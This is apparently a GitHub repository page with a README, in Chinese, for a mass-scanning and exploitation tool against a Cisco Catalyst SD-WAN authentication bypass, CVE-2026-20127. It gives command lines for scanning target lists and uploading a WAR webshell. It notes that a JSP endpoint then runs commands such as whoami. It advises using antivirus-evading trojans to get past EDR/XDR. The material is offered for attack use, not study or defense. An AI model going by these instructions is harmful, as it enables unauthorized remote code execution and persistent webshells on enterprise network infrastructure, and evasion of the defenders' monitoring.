BugFor-Pings/CVE-2026-20127_EXP

GitHub: BugFor-Pings/CVE-2026-20127_EXP

针对 Cisco Catalyst SD-WAN 身份验证绕过漏洞(CVE-2026-20127)的批量扫描与利用工具,支持命令执行和自定义 webshell 部署。

Stars: 0 | Forks: 0

# CVE-2026-20127_EXP Cisco Catalyst SD-WAN 身份验证绕过漏洞(CVE-2026-20127)漏洞利用EXP ### 基础用法 python scan.py -f targets.txt ### 显示详细信息 python scan.py -f targets.txt -v ### 调整线程数并保存结果 python scan.py -f targets.txt -t 10 -o vulnerable.txt ### 指定WAR文件路径 python scan.py -f targets.txt -w cmd.war ### 指定WAR文件路径调整线程并保存结果 python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt # =======注意事项======== 漏洞复现成功后访问/cmd.gz/cmd.jsp?cmd=whoami 会在页面显示结果 如果需要换成webshell,请自己制作war包(建议使用免杀马,经过测试存在Windows系统会有EDR或XDR)
标签:Catalyst SD-WAN, CISA项目, Cisco SD-WAN, CVE-2026-20127, EDR绕过, JS文件枚举, Python, WAR文件上传, Webshell, 企业网络安全, 无后门, 漏洞利用EXP, 漏洞复现, 编程工具, 网络安全, 身份验证绕过, 远程代码执行, 逆向工具, 隐私保护, 高交互蜜罐, 高危漏洞